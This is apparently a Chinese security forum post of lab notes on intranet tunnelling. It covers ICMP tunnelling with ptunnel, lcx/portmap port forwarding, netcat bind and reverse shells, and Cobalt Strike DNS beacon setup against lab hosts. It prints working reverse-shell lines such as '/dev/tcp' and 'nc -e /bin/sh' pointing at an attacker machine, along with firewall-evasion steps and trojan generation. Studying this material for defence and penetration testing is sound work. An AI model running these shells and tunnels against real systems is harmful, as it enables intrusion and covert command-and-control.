内网安全之隧道技术

zhaorong · 发表于 2022-6-22 10:47:09

知识点

隧道

在实际的网络中，通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况，如果发现异样
就会对通信进行阻断。那么什么是隧道呢？这里的隧道，就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包
通过防火墙所允许的数据包类型或端口进行封装，然后穿过防火墙，与对方进行通信。当封装的数据包到达目的地
时将数据包还原，并将还原后的数据包发送到相应服务器上。

代理和隧道技术的区别

代理主要解决网络访问通讯问题（从一个内网到另一个内网）。

隧道技术解决在代理基础之上通讯受阻的问题（被防火墙等检测拦截）达到绕过过滤限制等。

隧道技术解决什么

用单独的通道来传输被拦截的数据。

CS、MSF无法上线，数据传输不稳定无回显，出口数据被监控，网络通信存在问题等。

常见的隧道技术

网络层：IPv6隧道、ICMP隧道

传输层：TCP隧道、UDP隧道、常规端口转发

应用层：SSH隧道、HTTP/S隧道、DNS隧道

网络传输应用层检测连通性

1.TCP协议

用“瑞士jundao”netcat，执行nc命令：

nc <IP> <端口>

2.HTTP协议

用curl工具，执行：

curl <IP地址:端口>

如果远程主机开启了相应的端口，且内网可连接外网的话，就会输出相应的端口信息

3.ICMP协议

用ping命令，执行：

ping <IP地址/域名>

4.DNS协议

检测DNS连通性常用的命令是nslookup和dig

nslookup是windows自带的DNS探测命令

dig是linux系统自带的DNS探测命令

网络ICMP隧道Ptunnel使用

ptunnel把tcp/udp/sock5流量伪装成icmp流量进行转发

-p ##表示链接icmp隧道另一端的机器IP（目标服务器）
-lp 表示需要监听的本地tcp端口

-da ##指定需要转发的机器的IP（即目标内网某一机器的内网IP）

-dp ##指定需要转发的机器的端口（即目标内网某一机器的内网端口）

-x ##设置连接的密码

ptunnel安装

https://www.cnblogs.com/autopwn/p/14642658.html

Centos7下的安装步骤
#安装libpcap的依赖环境
yum -y install byacc
yum -y install flex bison
#安装libpcap依赖库
wget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz
tar -xzvf libpcap-1.9.0.tar.gz
cd libpcap-1.9.0
./configure
make && make install
#安装PingTunnel
wget http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.72.tar.gz
tar -xzvf PingTunnel-0.72.tar.gz
cd PingTunnel
make && make install
安装完成之后直接可以执行命令

实验

环境介绍

攻击机kali：192.168.184.128

中介机webserver：192.168.184.142(可出网) 192.168.22.128(内网)

目标机DC(windows)：192.168.22.130(内网)

打靶

中介机开启隧道，密码为123

ptunnel -x 123

攻击机连接隧道

ptunnel -p 192.168.184.142 -lp 2333 -da 192.168.22.130 -dp 3389 -x 123

当192.168.184.142（p）收到来自192.168.22.130（da）的3389端口（dp）的数据时发送
到攻击机的1080端口（lp）。反之亦然（在二者之间建立隧道）

攻击机(kali)使用rdesktop进行远程连接

rdesktop 127.0.0.1 2333

输入用户名密码登录成功

传输层转发隧道lcx、Portmap使用

Windows：lcx

Linux：portmap

windows演示

在被攻击机上：

lcx -slave 跳板机IP 6666 127.0.0.1 3389

将（被攻击机）本地的3389转发到跳板机的6666端口

在跳板机上（这里需要在跳板机监听才能接收到数据）：

lcx -listen 本机端口映射端口

lcx -listen 6666 7777

监听6666映射到7777

在攻击机上（进行远程连接）：

rdesktop 跳板机IP:7777

传输层转发隧道Netcat使用

1.双向连接反弹shell

正向：攻击连接受害

受害：

nc -ldp 1234 -e /bin/sh //linux

nc -ldp 1234 -e c:\windows\system32\cmd.exe //windows

将命令行界面（shell/cmd）推到1234端

攻击：

nc 受害机IP 1234 //主动连接

反向：受害连接攻击

攻击：

监听自己的1234端口

nc -lvp 1234

受害：

nc 攻击机IP 1234 -e /bin/sh

nc 攻击机IP 1234 -e c:\windows\system32\cmd.exe

2.多向连接反弹shell-配合转发-反向-portmap

Target2服务器将自己的cmd反弹到Target1的666端口，Target1使用portmap将本地666端口
映射到本地777端口，最后由kali(攻击机)连接Target1的777端口

Target2_Ubuntu

bash -i >& /dev/tcp/192.168.22.128/6666 <&1

Target1_CentOS

把666端口数据转发到777端口

./portmap -m 1 -p1 6666 -h2 192.168.184.128 -p2 7777

kali

nc -lvvp 7777

portmap使用

Usage:./portmap -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename]
-v: version
-h1: host1
-h2: host2
-p1: port1
-p2: port2
-log: log the data
-m: the action method for this tool
1: listen on PORT1 and connect to HOST2:PORT2
2: listen on PORT1 and PORT2
3: connect to HOST1:PORT1 and HOST2:PORT2

3.相关netcat主要功能

# 指纹服务
nc -nv 192.168.184.142:xxxx

# 端口扫描
nc -v -z 192.168.184.142 1-100

# 端口监听
nc -lvp xxxx

# 文件传输
nc -lp 1111 >1.txt|nc -vn xx.xx.x.x 1111 <1.txt -q 1

# 反弹Shell（见上）

应用层DNS隧道配合CS上线

当常见协议监听器被拦截时，可以换其他协议上线，其中dns协议上线基本通杀

原理

https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/top
ics/listener-infrastructue_beacon-dns.htm#_Toc65482740

Cobalt Strike｜Beacon原理浅析

Cobalt Strike DNS Beacon 的使用和原理

什么是Beacon
Beacon是Cobalt Strike运行在目标主机上的payload，Beacon在隐蔽信道上我们提供服务，用于长期控制受感染主机
它的工作方式与Metasploit Framework Payload类似。在实际渗透过程中，我们可以将其嵌入到可执行文件、添加到
Word文档或者通过利用主机漏洞来传递Beacon。

Beacon的功能包括以下几点：

使用HTTP或DNS检查是否有待执行任务
可连接到多个C2域名
能够在分段传输后自动迁移
与Cobalt Strike紧密集成，通过社工、主机漏洞和会话来传递Beacon

Beacon的中文名为信标像是在网络中告诉我们：“嘿，我是肉鸡，我在这...”。我们可以通过下图
来看Beacon的工作原理：

DNS Beacon 的工作过程

当受害者请求域名对应的ip地址时（通过 shell 或者钓鱼），会从根域名DNS服务器，一级域名DNS服务器二级域名DNS
服务器...依次向下寻找，直到我们的团队服务器，同时充当DNS服务器，将Beacon返回给团队服务器。DNS响应告诉Bea
con休眠或者连接到团队服务器来下载任务。DNS响应同时也告诉Beacon如何从团队服务器下载任务。

配置

配置监听器

需要买一个域名修改解析记录如下：

记录类型->主机记录->记录值

A记录->cs主机名->CS服务器IP

NS记录->ns1主机名->A记录地址

NS记录->ns2主机名->A记录地址

这里遇到了坑，创建不了监听器

一直说地址被占用，搞了好久，发现是我云服务器的53端口被占用了，关掉就好了

很奇怪的是，我和赵师傅都有这个进程，他就能创，我却不能，就很玄学。问了黄师傅说是有些服务有
关联性有的服务运行有优先级啥的，也说不准，只能说盲猜QAQ。

生成木马

Windows Executable 　　　　　生成32位或64位的exe和基于服务的exe、DLL等后门程序

Windows Executable(S)　　　　用于生成一个exe可执行文件，其中包含Beacon的完整payload，不需要阶段性的请求
与Windows Executable模块相比，该模块额外提供了代理设置，以便在较为苛刻的环境中进行渗透测试。该模块还支持
powershell脚本，可用于将Stageless Payload注入内存

利用

当受害者主机运行我们的木马后，便会有一个unknown主机上线

interact进去后，输入如下命令进行配置

beacon> checkin

Tasked beacon to checkin
beacon> mode dns-txt
[+] data channel set to DNS-TXT
[+] host called home, sent: 8 bytes

出现如下图的样子，就说明受害主机真正成功上线

接下来就可以执行命令了

这里还遇到另外一个坑，就是当时弄的时候用的学校网络，导致输入命令没有回显换了手机热点就行了，真的吐了。

		自动登录	找回密码
密码			注册

[WEB前端技术] 内网安全之隧道技术